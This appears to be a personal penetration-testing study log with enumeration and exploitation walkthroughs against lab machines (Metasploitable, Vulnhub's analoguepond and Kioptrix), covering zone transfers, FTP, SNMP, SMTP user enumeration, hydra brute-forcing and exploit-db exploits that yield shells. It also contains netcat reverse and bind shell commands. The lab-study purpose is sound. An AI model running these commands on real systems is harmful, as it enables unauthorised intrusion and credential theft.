zonetransfer.me mail is handled by 10 ALT2.ASPMX.L.GOOGLE.COM.
zonetransfer.me mail is handled by 20 ASPMX2.GOOGLEMAIL.COM.
zonetransfer.me mail is handled by 0 ASPMX.L.GOOGLE.COM.
zonetransfer.me mail is handled by 20 ASPMX5.GOOGLEMAIL.COM.
zonetransfer.me mail is handled by 20 ASPMX4.GOOGLEMAIL.COM.
zonetransfer.me mail is handled by 20 ASPMX3.GOOGLEMAIL.COM.
zonetransfer.me mail is handled by 10 ALT1.ASPMX.L.GOOGLE.COM.

zonetransfer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─# host -l zonetransfer.me nsztm1.digi.ninja                                                                  1 ⨯
Using domain server:
Name: nsztm1.digi.ninja
Address: 81.4.108.41#53
Aliases: 

zonetransfer.me has address 5.196.105.14
zonetransfer.me name server nsztm1.digi.ninja.
zonetransfer.me name server nsztm2.digi.ninja.
14.105.196.5.IN-ADDR.ARPA.zonetransfer.me domain name pointer www.zonetransfer.me.
asfdbbox.zonetransfer.me has address 127.0.0.1
canberra-office.zonetransfer.me has address 202.14.81.230
dc-office.zonetransfer.me has address 143.228.181.132
deadbeef.zonetransfer.me has IPv6 address dead:beaf::
email.zonetransfer.me has address 74.125.206.26
home.zonetransfer.me has address 127.0.0.1
internal.zonetransfer.me name server intns1.zonetransfer.me.
internal.zonetransfer.me name server intns2.zonetransfer.me.
intns1.zonetransfer.me has address 81.4.108.41
intns2.zonetransfer.me has address 167.88.42.94
office.zonetransfer.me has address 4.23.39.254
ipv6actnow.org.zonetransfer.me has IPv6 address 2001:67c:2e8:11::c100:1332
owa.zonetransfer.me has address 207.46.197.32
alltcpportsopen.firewall.test.zonetransfer.me has address 127.0.0.1
vpn.zonetransfer.me has address 174.36.59.154
www.zonetransfer.me has address 5.196.105.14

-l List zone: The host command performs a zone transfer of zone name and prints out the NS, PTR and address records (A/AAAA).

AXFR offers no authentication, so any client can ask a DNS server for a copy of the entire zone. This means that unless some kind of protection is introduced, an attacker can get a list of all hosts for a domain, which gives them a lot of potential attack vectors.

dnsrecon - DNS Enumeration and Scanning Tool

1
dnsrecon -d zonetransfer.me -t axfr

-d domain
-t type

dnsenum

multithread script to enumerate information on a domain and to discover non-contiguous IP blocks 

1
dnsenum zonetransfer.me

Other Enumeration

Find some Vulnhub box and do some scan

FTP

Default Port: 21
Using Metasploitable

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
nmap -nmap -Pn -sS -A -p 21 192.168.119.129 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-10 14:18 EST
Nmap scan report for 192.168.119.129
Host is up (0.00021s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.119.132
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
MAC Address: 00:0C:29:7F:42:67 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Unix

-sC: equivalent to –script=default
connect to it and get banner 

1
2
3
ftp 192.168.119.129                                                                                      130 ⨯
Connected to 192.168.119.129.
220 (vsFTPd 2.3.4)

Use Metasplit: 

1
2
3
4
5
6
7
8
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOST 192.168.119.129
RHOST => 192.168.119.129
msf6 auxiliary(scanner/ftp/ftp_version) > exploit

[+] 192.168.119.129:21    - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.119.129:21    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf6 auxiliary(scanner/ftp/ftp_login) > set blank_passwords true
blank_passwords => true
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.119.129
RHOSTS => 192.168.119.129
msf6 auxiliary(scanner/ftp/ftp_login) > set USERNAME anonyus
USERNAME => anonyus
msf6 auxiliary(scanner/ftp/ftp_login) > set username anonymous
username => anonymous
msf6 auxiliary(scanner/ftp/ftp_login) > exploit

[*] 192.168.119.129:21    - 192.168.119.129:21 - Starting FTP login sweep
[!] 192.168.119.129:21    - No active DB -- Credential data will not be saved!
[+] 192.168.119.129:21    - 192.168.119.129:21 - Login Successful: anonymous:
[*] 192.168.119.129:21    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use Hydra

hydra - a very fast network logon cracker which supports many different services 

1
2
3
4
5
6
7
8
9
hydra -s 21 -C ftp-default-userpass.txt -u -f 192.168.119.129 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-10 15:03:19
[DATA] max 11 tasks per 1 server, overall 11 tasks, 11 login tries, ~1 try per task
[DATA] attacking ftp://192.168.119.129:21/
[21][ftp] host: 192.168.119.129   login: ftp   password: ftp
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-10 15:03:20

-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated “login:pass” format, instead of -L/-P options
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-s port

Metasploit

searchsploit vfstpd 2.3.4 there’s a metasploit module

1
use unix/ftp/vsftpd_234_backdoor

can get the shell

SNMP

Vulnhub: analoguepond
reference walkthrough: http://xhyumiracle.com/vulnhub-analoguepond-walkthrough-part-1/

Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. Devices that typically support SNMP include cable modems, routers, switches, servers, workstations, printers, and more.

UDP port 161

  • SNMP enumeration is a process of enumerating user accounts and devices on a target system using SNMP.
  • SNMP consists of a manager and an agent; agents are embedded on every network device, and the manager is installed on a separate computer.
1
sudo nmap -sU -p1-200 192.168.119.133

snmp-brute

1
2
3
4
5
6
7
sudo nmap -sU -p161 --script snmp-brute 192.168.119.133 

PORT    STATE         SERVICE
161/udp open|filtered snmp
| snmp-brute: 
|_  public - Valid credentials
MAC Address: 00:0C:29:EA:20:95 (VMware)

onesixtyone

SNMP Scanner 

1
2
3
└─$ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 192.168.119.133                                         1 ⨯
Scanning 1 hosts, 51 communities
192.168.119.133 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64

-c <communityfile> file with community names to try
-d debug

snmp-check

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ snmp-check 192.168.119.133
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.119.133:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 192.168.119.133
  Hostname                      : analoguepond
  Description                   : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
  Contact                       : Eric Burdon <eric@example.com>
  Location                      : There is a house in New Orleans they call it...
  Uptime snmp                   : 00:38:18.10
  Uptime system                 : 00:38:07.70
  System date                   : 2021-3-11 03:01:11.0

snmp-check - SNMP device enumerator

Find string public

snmpwalk

retrieve a subtree of management values using SNMP GETNEXT requests

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
└─$ snmpwalk -v 2c -c public 192.168.119.133
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (259734) 0:43:17.34
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (260776) 0:43:27.76
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E5 03 0B 03 06 14 00 2B 00 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 25
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

-v 1|2c|3 specifies SNMP version to use
-c COMMUNITY set the community string
eric could be the user name
There is a house in New Orleans they call it.., google it, its a lyric:

1
2
There is a house in New Orleans
They call the Rising Sun,

suppose it’s the password, try it:

1
2
3
4
5
6
therisingsun
risingsun
rising sun
the rising sun
houseoftherisingsun
house of the rising sun

Use John to generate password candidates

1
2
john - a tool to find weak passwords of your users
john --wordlist=passlist --rules --stdout > passcandi

–rules[=SECTION[,..]] enable word mangling rules
–stdout[=LENGTH] just output candidate passwords [cut at LENGTH]
output candidates to file

then use hydra to crack

1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ hydra -P passcandi -l eric 192.168.119.133 ssh                                                           255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-10 22:24:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 156 login tries (l:1/p:156), ~10 tries per task
[DATA] attacking ssh://192.168.119.133:22/
[22][ssh] host: 192.168.119.133   login: eric   password: therisingsun
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-10 22:24:51

-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE

find password: therisingsun

1
2
3
4
ssh eric@192.168.119.133
eric@analoguepond:~$ sudo -v
sudo: unable to resolve host analoguepond
Sorry, user eric may not run sudo on analoguepond.

not a sudo user

1
2
3
4
5
6
eric@analoguepond:~$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

searchsploit ubuntu 14.04
found:
'overlayfs' Local Privilege Escalation

https://www.exploit-db.com/exploits/39166

get the root access 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@analoguepond:~# cd /root/
root@analoguepond:/root# ls
flag.txt
root@analoguepond:/root# cat flag.txt 
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

root@analoguepond:/root# netstat -nplt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      1231/dnsmasq    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      918/sshd        
tcp6       0      0 :::22                   :::*                    LISTEN      918/sshd    

netstat  -  Print network connections, routing tables, interface
       statistics, masquerade connections, and multicast memberships

-n, –numeric don’t resolve names
-p, –programs display PID/Program name for sockets
-l, –listening display listening server sockets
{-t|–tcp} {-u|–udp} {-w|–raw} {-x|–unix} 

1
2
3
4
ifconfig
virbr0    Link encap:Ethernet  HWaddr 52:54:00:b2:23:25  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0

could use the pingsweep.sh script on victim machine

there’s something else, but lets end here, since my aim is to learn snmp…

SMTP

1
2
3
4
5
6
7
telnet 192.169.119.129 25
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

rfy admin@metasploitable.localdomain
550 5.1.1 <admin@metasploitable.localdomain>: Recipient address rejected: User unknown in local recipient table
vrfy msfadmin@metasploitable.localdomain
252 2.0.0 msfadmin@metasploitable.localdomain

check if user exist

Metasploit:

1
2
3
4
5
6
7
8
9
10
use scanner/smtp/smtp_enum

Description:
  The SMTP service has two internal commands that allow the 
  enumeration of users: VRFY (confirming the names of valid users) and 
  EXPN (which reveals the actual address of users aliases and lists of 
  e-mail (mailing lists)). Through the implementation of these SMTP 
  commands can reveal a list of valid users.

[+] 192.168.119.129:25    - 192.168.119.129:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, mysql, news, nobody, postfix, postgres, postmaster, proxy, service, sshd, sync, sys,

Use smtp-user-enum

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
└─$ /usr/share/legion/scripts/smtp-user-enum.pl -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.119.129
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/metasploit/unix_users.txt
Target count ............. 1
Username count ........... 168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Wed Mar 10 21:16:31 2021 #########
192.168.119.129: backup exists
192.168.119.129: bin exists
192.168.119.129: daemon exists
192.168.119.129: distccd exists
192.168.119.129: ftp exists
192.168.119.129: games exists
192.168.119.129: gnats exists
192.168.119.129: irc exists
192.168.119.129: libuuid exists
192.168.119.129: list exists
192.168.119.129: lp exists
192.168.119.129: mail exists
192.168.119.129: man exists
192.168.119.129: mysql exists
192.168.119.129: news exists
192.168.119.129: nobody exists
192.168.119.129: postfix exists
192.168.119.129: postgres exists
192.168.119.129: postmaster exists
192.168.119.129: proxy exists
192.168.119.129: root exists
192.168.119.129: ROOT exists
192.168.119.129: service exists
192.168.119.129: sshd exists
192.168.119.129: sync exists
192.168.119.129: sys exists
192.168.119.129: syslog exists
192.168.119.129: user exists
192.168.119.129: uucp exists
192.168.119.129: www-data exists
######## Scan completed at Wed Mar 10 21:16:32 2021 #########
30 results.

168 queries in 1 seconds (168.0 queries / sec)

add -D metasploitable.localdomain to guess valid email address instead of user name

1
2
3
4
192.168.119.129: mysql@metasploitable.localdomain exists
192.168.119.129: news@metasploitable.localdomain exists
192.168.119.129: nobody@metasploitable.localdomain exists
192.168.119.129: postfix@metasploitable.localdomain exists

Netcat

1
nc -nv 192.168.0.22 80

-n numeric-only IP addresses, no DNS
-v verbose [use twice to be more verbose]

if victim execute this, it will connect to attacker’s listening nc, and provide shell to him

1
nc -nv attackerIP port -e /bin/bash

Listening

Victim listening on port, whoever connect to it will gain the shell

1
nc -nvlp 4444 -e /usr/bin/bash

-l listening
-p port
-e filename program to exec after connect [dangerous!!]

Kioptrix Level 1 Walkthrough|WalkThrough-Vulnhub-Penetration Testing

Find IP Address of target Box

check current interface:

1
2
3
4
5
6
7
8
9
10
─# ifconfig                                                     
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.119.130  netmask 255.255.255.0  broadcast 192.168.119.255
        inet6 fe80::20c:29ff:fec4:f034  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:c4:f0:34  txqueuelen 1000  (Ethernet)
        RX packets 184146  bytes 51512617 (49.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 167933  bytes 11553532 (11.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

interface is eth0

netdiscover

Using ARP messages to discover hosts

1
netdiscover -i eth0

-i device: your network device (interface)

image

So the target IP address is 192.168.119.254

Port Scan

first Scan

1
nmap -Pn -sS --stats-every 3m --max-scan-delay 20 --max-retries 1 --defeat-rst-ratelimit -p1-65535 -oN ~/kiotrix1.txt 192.168.119.254
1
2
3
4
5
6
7
8
9
10
11
12
13
14
--max-scan-delay to avoid following ICMP package get lost  

      --defeat-rst-ratelimit
           Many hosts have long used rate limiting to reduce the number of ICMP error messages (such as
           port-unreachable errors) they send. Some systems now apply similar rate limits to the RST (reset)
           packets they generate. This can slow Nmap down dramatically as it adjusts its timing to reflect those
           rate limits. You can tell Nmap to ignore those rate limits (for port scans such as SYN scan which don't
           treat non-responsive ports as open) by specifying --defeat-rst-ratelimit.

           Using this option can reduce accuracy, as some ports will appear non-responsive because Nmap didn't
           wait long enough for a rate-limited RST response. With a SYN scan, the non-response results in the port
           being labeled filtered rather than the closed state we see when RST packets are received. This option
           is useful when you only care about open ports, and distinguishing between closed and filtered ports
           isn't worth the extra time.

The port identifiers are unsigned 16-bit integers, meaning that the largest number you can put in there is 2^16-1 = 65535

Get error: All 65535 scanned ports on 192.168.119.254 are filtered

Issue

192.168.119.254 is not the IP address of Kioptrix box. I encounter a problem that Kioptrix can not be set use NAT or Host only mode. It will automatically switch to Bridged(Automatic) when launching. So weird. Link: network setting automatically switched to Bridged in VMWare Player

I will stick with briged mode for now, it is not safe btw.

So the IP address of target Box is 192.168.0.22

First Scan continue

1
2
3
4
5
6
7
8
9
map -sS -n -Pn -p- -T4 192.168.0.22 

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm

Second Scan

1
nmap -Pn -nvv -sSV -p 22,80,111,139,443,1024 --version-intensity 9 -A -oN 192.168.0.22

-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
–version-intensity <level>: Set from 0 (light) to 9 (try all probes)
-sSV is a combine of sS and sV, sV service and version detection

Some Notes

interesint 80, 443 for webserver, tcp 139 samba

SMB a communication protocal for providing shared access to files, printers, and serial ports between nodes on a network

1
2
3
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

UDP Scan

1
nmap --top-ports 1000 -sU -Pn --stats-every 3m --max-retries 1 -T3 192.168.0.22

SSH enumeration

openssh version: OpenSSH 2.9p2
Google it, find some CVE’s with Exec Code Overflow CVE-2002-0640
need OS to when OpenBSD is using PAM modules with interactive keyboard authentication (PAMAuthenticationViaKbdInt).

1
searchsploit openssh

Try directly connect to it:

1
2
3
4
5
6
7
8
9
10
11
ssh 192.168.0.22    
Unable to negotiate with 192.168.0.22 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

# so use one of the exchange method and try again
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 192.168.0.22 

Unable to negotiate with 192.168.0.22 port 22: no matching cipher found. Their offer: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc@lysator.liu.se

# then add the cipher
ssh -c aes128-cbc -oKexAlgorithms=+diffie-hellman-group1-sha1 192.168.0.22 
root@192.168.0.22's password:

Last resort for passwork attack, easy be detected, if theres a log
Usually SSH is not your first thing to try

HTTP Enumeration

port 80 and 443

  • go to their web page through web broser
  • view the source code
  • check out https://

Directory Scan

1
dirbuster

some wordlist stored in /usr/share/wordlists/dirbuster
Also download some big wordlist, google dirbuster wordlist
I actually not found through google, its in githubrepo https://github.com/digination/dirbuster-ng

remove manual from the wordlist, there are many php manual page, waste of time, but let me try
image

nothing interesting

1
nikto -h 192.168.0.22

-h -host

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
---------------------------------------------------------------------------
+ Target IP:          192.168.0.22
+ Target Hostname:    192.168.0.22
+ Target Port:        80
+ Start Time:         2021-03-09 21:53:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8724 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2021-03-09 21:53:58 (GMT-5) (24 seconds)
---------------------------------------------------------------------------

If there’s PUT or DELETE method, that would be interesting

scan for https: nikto -h 192.168.0.22:443

SMB Enumeration

add some smb configuration tc/samba/smb.conf 

1
2
3
[global]
client use spnego = no
client ntlmv2 auth = no

deprecated.. use the following

SPNEGO is used when a client application wants to authenticate to a remote server, but neither end is sure what authentication protocols the other supports.

not sure why I need those

1
enum4linux 192.168.0.22

Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.

1
2
3
4
5
===================================== 
|    Session Check on 192.168.0.22    |
 ===================================== 
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

resolve the issue by adding this to smb.conf:

1
client min protocol = NT1
1
2
3
4
5
6
7
8
9
10
11
 ====================================== 
|    OS information on 192.168.0.22    |
 ====================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.0.22 from smbclient: 
[+] Got OS info for 192.168.0.22 from srvinfo:
        KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
        platform_id     :       500
        os version      :       4.5
        server type     :       0x9a03

use metasploit to detect smb version

1
2
3
4
auxiliary/scanner/smb/smb_version
set rhosts 192.168.0.22
show options
exploit

samba version is Samba 2.2.1a

1
2
3
4
5
6
7
8
9
10
11
12
13
14
searchsploit samba 2.2
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation                                          | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                       | osx/remote/9924.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                         | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)                         | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)                         | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)                         | unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)                               | linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow            | unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow                                               | linux/remote/7.pl
---------------------------------------------------------------------------------- ---------------------------------

goto https://www.exploit-db.com/search, search for trans2open

Tried some exploits, https://www.exploit-db.com/exploits/22469 this one works and I successfully get the shell

1
./22469 -t 192.168.0.22

image

Nbtscan

1
2
3
4
5
6
7
nbtscan 192.168.0.22
Doing NBT name scan for addresses from 192.168.0.22

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.0.22     KIOPTRIX         <server>  KIOPTRIX         00:00:00:00:00:00

